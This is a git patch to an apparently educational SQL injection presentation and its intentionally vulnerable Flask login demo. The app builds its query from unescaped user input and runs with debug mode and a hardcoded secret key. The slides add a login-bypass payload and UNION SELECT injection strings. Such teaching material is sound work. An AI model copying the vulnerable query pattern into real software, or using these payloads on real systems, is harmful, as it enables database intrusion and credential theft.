From f1a8b2cbebeb8d1fa35395f4b4067081b04aa588 Mon Sep 17 00:00:00 2001 From: whx Date: Tue, 16 Apr 2024 13:11:51 +0000 Subject: [PATCH] added some more information to the presentation, linting of code for the example implemenation --- .../example/README.md | 27 +++++--- .../example/flask_sqli.py | 21 ++++--- .../example/templates/login.html | 5 +- .../presentation.html | 62 +++++++++++++++++-- .../sql_injection.md | 54 +++++++++++++++- 5 files changed, 143 insertions(+), 26 deletions(-) diff --git a/introduction-to-sql-injection/example/README.md b/introduction-to-sql-injection/example/README.md index f125322..1685530 100644 --- a/introduction-to-sql-injection/example/README.md +++ b/introduction-to-sql-injection/example/README.md @@ -1,9 +1,9 @@ # Example project of a website including an SQL injection This implementation is meant to be used for training purposes. -Do not use the code in production or development. +Do not use this code in production or as a blueprint for development! -## Usage +## Installation Use python poetry to install dependencies in the following way. @@ -11,6 +11,20 @@ Use python poetry to install dependencies in the following way. poetry install ``` +Dependencies can be found inside the `./pyproject.toml` file. + +After installation has been done, start the flask server. + +### Usage + +```sh +poetry run python3 ./flask_sqli.py +``` + +Now, the website is accessible at [localhost:5000](http://localhost:5000/) + +### Manual Installation + If you want to install the dependencies manually use a venv in the following way. ```sh @@ -19,12 +33,11 @@ source venv/bin/activate pip install flask ``` -Dependencies can be found inside the `./pyproject.toml` file. +### Usage after manual installation -After installation has been done, start the flask server. +Start the flask server without poetry in the following way. ```sh -poetry run python3 ./flask_sqli.py +source venv/bin/activate +python3 ./flask_sqli.py ``` - -Now, the website is accessible at [localhost:5000](http://localhost:5000/) diff --git a/introduction-to-sql-injection/example/flask_sqli.py b/introduction-to-sql-injection/example/flask_sqli.py index 04449ad..ba5a581 100644 --- a/introduction-to-sql-injection/example/flask_sqli.py +++ b/introduction-to-sql-injection/example/flask_sqli.py @@ -1,9 +1,10 @@ -from flask import Flask, request, render_template +from flask import Flask, flash, request, render_template import sqlite3 app = Flask(__name__) app.secret_key = 'secret_key' + def db_connection(): conn = sqlite3.connect('users.db') c = conn.cursor() @@ -21,23 +22,27 @@ def login(): password = request.form['password'] # Vulnerable code with SQL injection vulnerability - query = "SELECT * FROM users WHERE username='" + username + "' AND \ - password='" + password + "'" + query = "SELECT * FROM users WHERE username = '%s' AND password = '%s'" \ + % (username, password) - c = db_connection() - c.execute(query) - user = c.fetchone() + # YOU CAN ALSO WRITE IT LIKE THIS: + # query = "SELECT * FROM users WHERE username='" + username + "' AND \ + # password='" + password + "'" try: + c = db_connection() + c.execute(query) + user = c.fetchone() + if user: login_failed = False return render_template('profile.html') else: login_failed = True - return render_template('login.html', login_failed=login_failed, error_message=user) + return render_template('login.html', login_failed=login_failed) except sqlite3.Error as e: flash(f"{e}") - return render_template('login.html') + return render_template('login.html', error=e) if __name__ == '__main__': app.run(host='0.0.0.0', debug=True) diff --git a/introduction-to-sql-injection/example/templates/login.html b/introduction-to-sql-injection/example/templates/login.html index b1caada..e998d2f 100644 --- a/introduction-to-sql-injection/example/templates/login.html +++ b/introduction-to-sql-injection/example/templates/login.html @@ -5,7 +5,7 @@ {% with messages = get_flashed_messages(with_categories=True) %} {% if messages %} {% for category, message in messages %} -
+
{{ message }}
{% endfor %} @@ -25,7 +25,4 @@
- {% if error_message %} - {{ error_message }} - {% endif %} {% endblock info %} diff --git a/introduction-to-sql-injection/presentation.html b/introduction-to-sql-injection/presentation.html index 2ed679d..71309e1 100644 --- a/introduction-to-sql-injection/presentation.html +++ b/introduction-to-sql-injection/presentation.html @@ -126,17 +126,19 @@ Next Presentation 
sql_query =
   cursor.execute(
-    "SELECT * FROM user_data where username = 'admin' and password = 's3cur3P4ssw0rd'"
-  )
+ "SELECT * FROM users WHERE username = 'admin' \ + AND password = 's3cur3P4ssw0rd'" + )

Number 2

-

User input is possible as a part of said SQL query

+

User input is possible as a string and is a part of said SQL +query

sql_query =
   cursor.execute(
-    "SELECT * FROM user_data where username = '%s' and password = '%s'",
+    "SELECT * FROM users WHERE username = '%s' AND password = '%s'" \
     % (username, password)
   )
@@ -149,6 +151,58 @@ Injection
  • Continue the query with your own SQL code
    • +
    + +

    Crafting an SQL Query

    +
    +
    ' or '1'='1' -- -
    +
    + +
    +
    + +

    What Does the Query Look +Like

    +
    SELECT * FROM users WHERE username = '' or '1' = '1' -- - AND password '%s'
    +

    Numbers as strings is an SQLite specific thing

    +
    +
    + +

    Other Queries

    +
    ' UNION SELECT 'a',NULL,NULL,NULL -- -
+' UNION SELECT * FROM users WHERE user_id = 1 -- -
+' UNION SELECT * FROM users WHERE user_id != 1337 -- -
    +
    +
    + +

    Even More Injection Queries

    + +
    +
    + +

    Try for Yourself

    +

    Use the provided example inside this +presentation’s repository. There is a readme which guides you through the +setup.

    +

    The End

    Convoluted Code

    diff --git a/introduction-to-sql-injection/sql_injection.md b/introduction-to-sql-injection/sql_injection.md index cb7b8db..b4172ba 100644 --- a/introduction-to-sql-injection/sql_injection.md +++ b/introduction-to-sql-injection/sql_injection.md @@ -25,7 +25,8 @@ An SQL Query as a string embedded in other languages ```python sql_query = cursor.execute( - "SELECT * FROM user_data where username = 'admin' and password = 's3cur3P4ssw0rd'" + "SELECT * FROM users WHERE username = 'admin' \ + AND password = 's3cur3P4ssw0rd'" ) ``` @@ -33,12 +34,12 @@ sql_query = ### Number 2 -User input is possible as a part of said SQL query +User input is possible as a string and is a part of said SQL query ```python sql_query = cursor.execute( - "SELECT * FROM user_data where username = '%s' and password = '%s'", + "SELECT * FROM users WHERE username = '%s' AND password = '%s'" \ % (username, password) ) ``` @@ -52,6 +53,53 @@ sql_query = --- +### Crafting an SQL Query + +>```sql +>' or '1'='1' -- - +>``` + +* Close the existing string with: `'` +* Write a query that equals to True: `1=1` +* End the SQL query through a comment: `-- -` + +--- + +### What Does the Query Look Like + +```SQL +SELECT * FROM users WHERE username = '' or '1' = '1' -- - AND password '%s' +``` + +*Numbers as strings is an SQLite specific thing* + +--- + +### Other Queries + +```sql +' UNION SELECT 'a',NULL,NULL,NULL -- - +' UNION SELECT * FROM users WHERE user_id = 1 -- - +' UNION SELECT * FROM users WHERE user_id != 1337 -- - +``` + +--- + +## Even More Injection Queries + +* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) +* [Hacktricks SQL Injection Page](https://book.hacktricks.xyz/pentesting-web/sql-injection) +* [SQLMap](https://github.com/sqlmapproject/sqlmap) + +--- + +## Try for Yourself + +Use the provided [example](./example) inside this presentation's repository. +There is a [readme](./example/README.md) which guides you through the setup. + +--- + # The End Convoluted Code